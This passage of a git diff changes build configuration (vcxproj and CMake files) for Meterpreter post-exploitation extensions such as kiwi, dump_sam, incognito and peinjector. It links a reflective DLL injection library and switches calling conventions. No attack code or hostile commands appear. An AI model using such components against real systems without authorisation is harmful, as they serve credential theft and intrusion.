target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj b/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj index 15be2cea9..bebb0d00d 100755 --- a/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj +++ b/c/meterpreter/workspace/dump_sam/dump_sam.vcxproj @@ -56,6 +56,7 @@ + @@ -112,10 +113,11 @@ MultiThreaded false false - StdCall + Cdecl CompileAsC Default false + false Windows @@ -125,6 +127,7 @@ false false $(ProjectDir)../../source/dump_sam/dump_sam.def + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -146,8 +149,9 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) true MultiThreadedDLL false - StdCall + Cdecl CompileAsC + false Windows @@ -158,6 +162,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) false DllMain $(ProjectDir)../../source/dump_sam/dump_sam.def + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -181,10 +186,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" MultiThreaded false false - StdCall + Cdecl CompileAsC Default false + false Windows @@ -194,6 +200,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" false false $(ProjectDir)../../source/dump_sam/dump_sam.def + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -215,8 +222,9 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) true MultiThreadedDLL false - StdCall + Cdecl CompileAsC + false Windows @@ -227,6 +235,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) false DllMain $(ProjectDir)../../source/dump_sam/dump_sam.def + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -248,8 +257,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + true + true + + + Document + true + true + + \ No newline at end of file diff --git a/c/meterpreter/workspace/elevator/CMakeLists.txt b/c/meterpreter/workspace/elevator/CMakeLists.txt index b7a3afd73..e18964f3f 100644 --- a/c/meterpreter/workspace/elevator/CMakeLists.txt +++ b/c/meterpreter/workspace/elevator/CMakeLists.txt @@ -24,7 +24,7 @@ set_target_properties(${PROJECT_NAME} PROPERTIES OUTPUT_NAME ${PROJECT_NAME}.${T set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DIR}/plugin.def\"") set_source_files_properties(${MOD_DEF_DIR}/plugin.def PROPERTIES HEADER_FILE_ONLY TRUE) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/elevator/elevator.vcxproj b/c/meterpreter/workspace/elevator/elevator.vcxproj index d0b5620f4..749cb53ac 100644 --- a/c/meterpreter/workspace/elevator/elevator.vcxproj +++ b/c/meterpreter/workspace/elevator/elevator.vcxproj @@ -122,7 +122,7 @@ NotUsing Level3 ProgramDatabase - StdCall + Cdecl CompileAsC false true @@ -145,6 +145,7 @@ $(ProjectDir)..\..\source\def\plugin.def /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -163,7 +164,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" NotUsing Level3 ProgramDatabase - StdCall + Cdecl CompileAsC false true @@ -187,6 +188,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -205,7 +207,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) NotUsing Level3 ProgramDatabase - StdCall + Cdecl CompileAsC false true @@ -228,6 +230,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\plugin.def /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -249,7 +252,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" NotUsing Level3 ProgramDatabase - StdCall + Cdecl CompileAsC true ..\..\source\ReflectiveDLLInjection\common;..\..\source\common @@ -288,7 +291,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" NotUsing Level3 ProgramDatabase - StdCall + Cdecl CompileAsC true ..\..\source\ReflectiveDLLInjection\common;..\..\source\common @@ -329,7 +332,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) NotUsing Level3 ProgramDatabase - StdCall + Cdecl CompileAsC true ..\..\source\ReflectiveDLLInjection\common;..\..\source\common @@ -365,6 +368,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + Document + true + true + ASSEMBLE + + + true + true + true + + @@ -372,4 +389,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt b/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt index 702c7f640..fbd48fd03 100644 --- a/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_bofloader/CMakeLists.txt @@ -39,7 +39,7 @@ if(MSVC) set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj index aba733413..7f564180d 100644 --- a/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj +++ b/c/meterpreter/workspace/ext_server_bofloader/ext_server_bofloader.vcxproj @@ -37,6 +37,18 @@ + + + true + true + true + + + true + true + true + + {486B160F-C571-486D-AAC3-CB60CEA7CBDD} ext_server_incognito @@ -170,10 +182,11 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No - editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" @@ -226,10 +239,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No - editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)" @@ -281,10 +295,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No - editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" @@ -340,10 +355,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No - editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" @@ -400,10 +416,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No - editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName).debug$(TargetExt)" @@ -459,10 +476,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No - editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL -IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL +IF NOT EXIST "$(ProjectDir)..\..\output\" mkdir "$(ProjectDir)..\..\output\" copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" diff --git a/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt b/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt index 01de6126a..a89824aee 100644 --- a/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_espia/CMakeLists.txt @@ -29,7 +29,7 @@ if(MSVC) endif() set(LINK_LIBS jpeg) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj index 4065c24c6..f4ac0d194 100644 --- a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj +++ b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj @@ -159,6 +159,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -216,6 +217,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -272,6 +274,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -328,6 +331,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -385,6 +389,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -441,6 +446,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + false editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -457,6 +463,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -464,4 +482,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt index d1f4efd06..cd6b8f713 100644 --- a/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt @@ -43,7 +43,7 @@ if(MSVC) else() endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj b/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj index 33891ee83..ef46e556d 100644 --- a/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj +++ b/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj @@ -152,6 +152,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -261,6 +263,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -316,6 +319,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -372,6 +376,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -427,6 +432,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -469,6 +475,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -476,4 +494,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt b/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt index 6ad783b10..450af691a 100644 --- a/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt @@ -30,7 +30,7 @@ if(MSVC) endif() set(LINK_LIBS netapi32 mpr) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj b/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj index 18a5b22cd..bee876bdc 100644 --- a/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj +++ b/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj @@ -157,6 +157,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -212,6 +213,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -266,6 +268,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -324,6 +327,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -383,6 +387,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -441,6 +446,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -466,8 +472,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt index 972c18ba0..89d17f39f 100644 --- a/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt @@ -46,6 +46,10 @@ else() '-D__success=DISCARD' '-D__FUNCTION__=""' '-D__struct_bcount=DISCARD' + '-D__nullterminated=SAL__nullterminated' + '-D__in_range=__RPC__in_range' + '-D__callback=SAL__callback' + '-D__deref_in_bcount_opt=SAL__deref_in_bcount_opt' ) endif() @@ -136,7 +140,7 @@ set(LINK_LIBS ${KIWI_LIB_DIR}/bcrypt.lib ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj index e3e5b0abe..ea63cc195 100644 --- a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj +++ b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj @@ -192,6 +192,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -249,6 +250,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -305,6 +307,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -365,6 +368,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -426,6 +430,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -486,6 +491,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -745,6 +751,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + diff --git a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters index c17462c4f..3edf88046 100644 --- a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters +++ b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters @@ -712,4 +712,8 @@ {fdb3471d-bb0a-4de4-95ff-f4f343270ebd} + + + + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt b/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt index b8ff489fa..8e79919c9 100644 --- a/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt @@ -37,7 +37,7 @@ set(LINK_LIBS ws2_32 ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") else() diff --git a/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj b/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj index 3490dc0ed..3ccfe362e 100644 --- a/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj +++ b/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj @@ -146,6 +146,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -193,6 +194,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -239,6 +241,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -293,6 +296,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -348,6 +352,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -402,6 +407,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -420,6 +426,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -427,4 +445,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt b/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt index aaa662ae0..69343e417 100644 --- a/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt @@ -29,7 +29,7 @@ if(MSVC) set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj b/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj index a8a5ce5d1..137fcc1c4 100755 --- a/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj +++ b/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj @@ -152,6 +152,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -261,6 +263,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -316,6 +319,7 @@ 